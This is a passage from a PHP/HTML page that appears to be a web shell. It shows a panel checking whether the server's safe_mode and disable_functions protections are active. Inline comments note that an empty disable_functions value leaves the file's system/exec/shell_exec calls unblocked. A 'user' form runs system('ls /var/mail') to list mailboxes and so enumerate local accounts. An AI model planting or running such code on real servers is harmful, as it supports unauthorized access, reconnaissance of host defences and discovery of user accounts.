  536.     <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="show"></strong></td>
  537.                     </tr>
  538. <input name="page" type="hidden" value="show">
  539. </form>
  540.                     <tr>
  541.     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Info
  542.     Security</strong></td>
  543.                     </tr>
  544.         <tr>
  545.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>
  546.     <td valign="top" bgcolor="#151515" colspan="5">
  547.     <strong>
  548. <?php
  // Reports the host's PHP hardening state: prints ON when the safe_mode ini
  // value reads '1', OFF for anything else (including when the setting does
  // not exist and ini_get() returns false).
  549. $safe_mode = ini_get('safe_mode');
  550. if($safe_mode=='1')
  551. {
  552. echo 'ON';
  553. }else{
  554. echo 'OFF';
  555. }
  556.  
  557. ?>
  558.     </strong>
  559.     </td>
  560.                     </tr>
  561.     <tr>
  562.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Function</strong></td>
  563.     <td valign="top" bgcolor="#151515" colspan="5">
  564.     <strong>
  565. <?php
  // Prints the disable_functions ini value, or "No Security for Function"
  // when it is empty. This is the setting that decides whether the
  // system/passthru/exec/shell_exec calls elsewhere in this file can run,
  // so an empty value here means none of them is blocked at the PHP level.
  566. if(''==($func=@ini_get('disable_functions')))
  567. {
  568. echo "<font color=#00800F>No Security for Function</font></b>";
  569. }else{
  570. echo "<font color=red>$func</font></b>";
  571. }
  572. ?></strong></td>
  573.     <tr>
  574.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
  575.     <td valign="top" bgcolor="#151515" colspan="5"><strong></strong></td>
  576.     </table>
  577.     </td>
  578.     </tr>
  579.     </table>
  580.  
  581.  
  582.  
  583.  
  584.     <meta http-equiv="content-type" content="text/html; charset=UTF-8"></head><body></body></html>
  585.  
  586.  
  587.  
  588.  
  589.  
  590.       <form style="border: 0px ridge #FFFFFF">
  591.  
  592.  
  593.  
  594.  
  595.     <p align="center"></td>
  596.   </tr><div align="center">
  597.  
  598.                 <tr>
  599.  
  600.  
  601.  
  602. <input type="submit"   name="user" value="user"><option value="name"></select>
  603. </form>
  604.  
  605.  
  606. <div align="center">
  607.  <table border="5" width="10%" bordercolorlight="#008000" bordercolordark="#006A00" height="100" cellspacing="5">
  608. <tr>
  609. <td bordercolorlight="#008000" bordercolordark="#006A00">
  610. <p align="left">
  611. <textarea  method='POST' rows="25" name="S1" cols="16">
  612.  
  613.  
  614. <?php
  615.  
  // When a "user" query parameter is present, runs a fixed directory listing
  // of /var/mail and prints it into the surrounding <textarea>; mailbox file
  // names there typically match local account names. The `if` has no braces,
  // so it governs only the system() call; the for loop that follows always
  // runs and has an empty body.
  616.       if ($_GET['user'] )
  617.       system('ls /var/mail');
  618.                                         for($uid=0;$uid<90000;$uid++){
  619.  
  620.                                         }
  621.  
  622. ?></textarea>